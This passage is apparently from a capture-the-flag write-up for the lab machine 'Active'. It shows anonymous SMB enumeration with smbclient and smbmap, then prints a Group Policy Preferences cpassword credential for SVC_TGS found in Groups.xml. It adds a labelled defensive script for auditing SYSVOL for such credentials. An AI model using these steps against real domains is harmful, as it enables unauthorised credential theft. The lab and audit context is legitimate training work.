- IPC$          NO ACCESS
- NETLOGON      NO ACCESS
- Replication   READ ONLY
- SYSVOL        NO ACCESS
- Users         NO ACCESS
Replication share – SMB
Enumeration
Since I can access \\10.10.10.100\Replication without a password, I'll use smbclient to connect and take a look around.
- root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Replication -U ""%""
- Try "help" to get a list of possible commands.
- smb: \>
Alternatively, I can use smbmap to recursively list all the files in the share, with the following command:
- smbmap -H 10.10.10.100 -R
Either method works, and I noticed an interesting file, Groups.xml, shown below:
- smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
- . D 0 Sat Jul 21 06:37:44 2018
- .. D 0 Sat Jul 21 06:37:44 2018
- Groups.xml A 533 Wed Jul 18 16:46:06 2018
It has username and cpassword fields:
- <?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
- <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
- <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
- </User></Groups>
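As an added example (not part of the original write-up), a defender can audit a local copy of SYSVOL for the condition this Groups.xml shows: a Group Policy Preferences element carrying a non-empty cpassword attribute. It generalizes from Groups.xml to every .xml file under the tree; the names find_cpasswords and demo, the sample account and the placeholder cpassword value are constructed for illustration.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample modelled on the Groups.xml layout above; the account
# names and the cpassword value are placeholders, not real data.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="example.local\\SVC_DEMO" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="PLACEHOLDER_VALUE" userName="example.local\\SVC_DEMO"/>
  </User>
  <User name="example.local\\NoSecret" changed="2018-07-19 10:00:00">
    <Properties action="U" cpassword="" userName="example.local\\NoSecret"/>
  </User>
</Groups>
"""

def find_cpasswords(root_dir):
    """Return one finding per XML element with a non-empty cpassword attribute."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # skip malformed XML instead of aborting the audit
            parents = {child: parent for parent in tree.iter() for child in parent}
            for elem in tree.iter():
                if elem.get("cpassword"):  # an empty value stores no secret
                    owner = parents.get(elem, elem)
                    # Fall back to the parent's name when userName is absent.
                    findings.append({"file": os.path.relpath(path, root_dir),
                                     "account": elem.get("userName") or owner.get("name"),
                                     "changed": owner.get("changed")})
    return findings

def demo():
    """Build a throwaway SYSVOL-like tree (constructed) and audit it."""
    with tempfile.TemporaryDirectory() as root:
        gpo = os.path.join(root, "Policies", "{CONSTRUCTED-GUID}", "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo)
        for fname, body in (("Groups.xml", SAMPLE_GROUPS_XML), ("broken.xml", "<Groups><User>")):
            with open(os.path.join(gpo, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
        return find_cpasswords(root)

if __name__ == "__main__":
    print(demo())
```

Each finding identifies a preference item to delete and an account whose password should be rotated.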
GPP Passwords